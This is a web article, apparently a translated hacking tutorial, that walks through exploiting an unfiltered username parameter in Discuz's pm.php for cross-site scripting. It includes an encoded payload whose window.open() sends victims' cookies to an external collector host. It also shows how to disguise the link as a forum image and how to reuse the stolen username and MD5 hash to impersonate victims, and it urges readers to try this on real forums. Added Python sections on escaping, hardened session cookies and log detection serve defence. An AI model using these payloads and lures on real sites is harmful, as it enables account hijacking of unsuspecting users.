Cross-site scripting attack + cookie spoofing (Discuz) | Vulnerability Research

Source: Internet
Author: User
Tags: md5
This time I'll use Discuz for the demonstration. First, as we all know, Discuz's pm.php does no filtering on the member name, so we can write script into it.

Smart students will have thought of it already: we can use this hole to write a script that grabs cookies.

This is like seeing the colour change in a reaction: now it should click! (borrowed from a math cram school = = ")

So first we get our own cookies out from this side ...

Example:

http://www.abc.com/pm.php?action=send&username=what are you looking at?"><script>alert(document.cookie)</script><
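As an added illustration (not from the article, and not Discuz code, which is PHP), the following Python shows the defect in pm.php's handling of the username parameter next to its fix: the same value rendered unfiltered, rendered with proper HTML attribute encoding, and rendered with a half-measure that escapes angle brackets but not quotes. The template string and function names are assumptions for this example; in PHP the equivalent of html.escape(..., quote=True) is htmlspecialchars($s, ENT_QUOTES).

```python
"""Added illustration: the unfiltered pm.php username next to its fix.

Discuz is PHP; this Python mirrors the idea. The template and function
names are assumptions for this example, not Discuz code.
"""
import html

# Constructed payload in the shape the article shows: it closes the value=""
# attribute, then injects a <script> element.
SAMPLE_PAYLOAD = 'what are you looking at?"><script>alert(document.cookie)</script><b"'


def render_recipient_unsafe(username: str) -> str:
    """Echo the username parameter back into the send form without filtering,
    which is the defect the article describes."""
    return f'<input type="text" name="username" value="{username}">'


def render_recipient_safe(username: str) -> str:
    """Encode for an HTML attribute context: &, <, >, " and ' become entities,
    so the value can neither terminate the attribute nor start a tag.
    (PHP equivalent: htmlspecialchars($s, ENT_QUOTES).)"""
    return f'<input type="text" name="username" value="{html.escape(username, quote=True)}">'


def render_recipient_half_fixed(username: str) -> str:
    """A common half-measure: escape <, > and & but leave quotes alone.
    Inside an attribute the value can still break out with a double quote
    and add event-handler attributes, so this is not enough."""
    return f'<input type="text" name="username" value="{html.escape(username, quote=False)}">'


# Raw double quotes that belong to the template itself (the value is empty here).
TEMPLATE_QUOTES = render_recipient_safe("").count('"')


def attribute_breakout(rendered: str) -> bool:
    """True if the rendered markup holds more raw quotes than the template:
    an attacker-supplied quote has closed the attribute early."""
    return rendered.count('"') > TEMPLATE_QUOTES


def injected_script(rendered: str) -> bool:
    """True if a literal <script tag survived into the output."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for name, render in (("unsafe", render_recipient_unsafe),
                         ("half-fixed", render_recipient_half_fixed),
                         ("safe", render_recipient_safe)):
        out = render(SAMPLE_PAYLOAD)
        print(f"{name:10s} breakout={attribute_breakout(out)} script={injected_script(out)}")
```

The half-fixed variant is worth keeping in mind when reviewing a patch: stripping `<` and `>` alone looks like a fix, but in an attribute context the quote is the character that matters.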

OK? Next, we use a cross-site approach to get someone else's cookies. First, get the other party to open our carefully crafted URL; the script then calls our PHP or ASP program, which writes their cookies into its record ... (if you need such a program, Google it; there are plenty on mainland sites) ...

Once we have the other party's cookies, we look for the forum's cookie in what was recorded.

After you find it, change the information in your cookie to that user name and the MD5-hashed password ...

Remember, the MD5 hash does not need to be reversed ~
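Added example, not from the article: why a cookie built from the user name and the MD5 of the password is so easy to reuse, and what a safer session cookie looks like. The cookie layout, user table and class names below are assumptions for the illustration, not Discuz's actual format.

```python
"""Added example: a credential-carrying cookie versus an opaque session token.

Not Discuz code. The tab-separated cookie layout, the USERS table and the
SessionStore class are assumptions made for this illustration.
"""
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed user table: the forum stores md5(password), as the article implies.
USERS = {"alice": hashlib.md5(b"hunter2").hexdigest()}


def legacy_cookie(username: str, password: str) -> str:
    """The old scheme: the cookie carries the credential itself, so it stays
    valid as long as the password does, from any browser that presents it."""
    return f"{username}\t{hashlib.md5(password.encode()).hexdigest()}"


def legacy_validate(cookie: str) -> Optional[str]:
    """Compare the MD5 in the cookie with the stored one. The clear password is
    never needed, which is the article's point: a copied cookie logs in until
    the password changes. There is no expiry and nothing to revoke."""
    username, _, pw_hash = cookie.partition("\t")
    stored = USERS.get(username)
    if stored is not None and hmac.compare_digest(stored, pw_hash):
        return username
    return None


class SessionStore:
    """Hardened scheme: the cookie holds a random opaque token; who it belongs
    to and how long it lives is kept server-side, so a session can expire or
    be revoked without touching the password."""

    def __init__(self, ttl_seconds: int = 3600) -> None:
        self.ttl = ttl_seconds
        self._sessions = {}  # token -> (username, expiry timestamp)

    def issue(self, username: str, now: float) -> str:
        token = secrets.token_urlsafe(32)  # 256 random bits, not derived from anything
        self._sessions[token] = (username, now + self.ttl)
        return token

    def validate(self, token: str, now: float) -> Optional[str]:
        entry = self._sessions.get(token)
        if entry is None:
            return None
        username, expiry = entry
        if now >= expiry:
            del self._sessions[token]
            return None
        return username

    def revoke(self, token: str) -> None:
        """Log out one browser (for example after the user reports a hijack)."""
        self._sessions.pop(token, None)


def set_cookie_header(token: str, max_age: int = 3600) -> str:
    """HttpOnly keeps document.cookie (the alert/window.open trick above) from
    reading the value; Secure and SameSite limit where the browser sends it."""
    return (f"Set-Cookie: session={token}; Max-Age={max_age}; Path=/; "
            "HttpOnly; Secure; SameSite=Lax")


if __name__ == "__main__":
    print("legacy:", legacy_validate(legacy_cookie("alice", "hunter2")))
    store = SessionStore(ttl_seconds=60)
    tok = store.issue("alice", now=1000.0)
    print("fresh:", store.validate(tok, now=1030.0), "expired:", store.validate(tok, now=1070.0))
    print(set_cookie_header(tok))
```

HttpOnly is the single attribute that defeats the specific trick in this article, since the injected script reads document.cookie; the opaque token is what removes the value of stealing the cookie in the first place, because it can be expired and revoked and reveals nothing about the password.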

That's the principle done ... now go, you little rascals!

We already know the pm.php bug, and we've uploaded the PHP program that completes it.

Next we go to the forum and post the link! P.S. On some forums the avatar can also be used to trick people ...

It all depends on each person's own thinking .... (thinking of my maths teacher again = = ")

I posted a link to a computer-related article and attached a picture ... (hehe, the emphasis is on the picture ~)

Suppose there is a fake URL, http://myweb.hinet.net/uarestupid/home1/XXX.jpg.

Anything that looks like a picture link is enough ....

Then use http://myweb.hinet.net/uarestupid/home1/XXX.jpg as the visible text over our vulnerable link, so that it looks like this:

http://myweb.hinet.net/uarestupid/home1/XXX.jpg

The picture link above looks like a picture to everyone, so nobody gives it a second thought ... but it actually goes to:

http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3a%2f%2f%6d%65%6d%62%65%72%73%2e%6c%79%63%6f%73%2e%63%6f%2e%75%6b%2f%6a%65%72%65%6d%79%68%63%77%2f%68%2e%70%68%70?"%2bdocument.cookie)%3c/script%3e%3cb%22

I have already URL-encoded the link above; diligent students can decode it themselves ...

So when he clicks the picture link .... his cookies are sent out = " but he still sees the picture ...
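For the defender's side, an added example (not from the article) that decodes percent-encoded request URIs from access logs, flags parameters that still contain script markers after decoding, and pulls out the host that an injected window.open() reports to. The log lines are constructed in common log format and collector.example is a placeholder host; the function names are this example's own.

```python
"""Added detection example: find encoded pm.php-style payloads in access logs.

The log lines are constructed (common log format). collector.example stands in
for whatever host the injected script reports to.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2004:13:55:36 +0800] "GET /pm.php?action=send&username=alice HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2004:13:57:02 +0800] "GET /pm.php?action=send&username=x%22%3E%3Cscript%3Ewindow.open(%22http://collector.example/h.php?%22%2Bdocument.cookie)%3C/script%3E%3Cb%22 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2004:13:58:11 +0800] "GET /pm.php?action=send&username=x%2522%253E%253Cscript%2520src%253D%2522http://collector.example/x.js%2522%253E%253C/script%253E HTTP/1.1" 200 5120
198.51.100.2 - - [10/Oct/2004:14:01:40 +0800] "GET /viewthread.php?tid=42 HTTP/1.1" 200 8000
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/')
# Markers of injected script in a decoded parameter value (matched lower-case).
INDICATORS = ("<script", "document.cookie", "window.open", "javascript:", "onerror=", "onload=")
URL_RE = re.compile(r"https?://[^\s\"'()<>]+", re.IGNORECASE)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double encoding (%2522 -> %22 -> ") cannot hide a payload."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(uri: str) -> Dict[str, object]:
    """Decode each query parameter; report which ones carry indicators and any
    external host the decoded payload refers to."""
    parts = urlsplit(uri)
    hits: Dict[str, List[str]] = {}
    exfil_hosts = set()
    # parse_qs already percent-decodes once; decode_fully handles further layers.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_fully(raw).lower()
            found = [ind for ind in INDICATORS if ind in decoded]
            if found:
                hits[name] = found
                for url in URL_RE.findall(decoded):
                    host = urlsplit(url).hostname
                    if host:
                        exfil_hosts.add(host)
    return {"path": parts.path, "params": hits, "exfil_hosts": sorted(exfil_hosts)}


def scan_log(log_text: str) -> List[Dict[str, object]]:
    """Run scan_request over every parsable request line; keep only the hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        result = scan_request(m.group("uri"))
        if result["params"]:
            result["ip"] = m.group("ip")
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["path"], finding["params"], finding["exfil_hosts"])
```

The decoded view is what matters: a raw-log grep for `<script` misses both sample hits, while a grep for `%3Cscript` misses the double-encoded one. The extracted host list is the pivot for the incident response side: which users' browsers fetched that host, and therefore whose cookies should be treated as exposed and their sessions invalidated.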
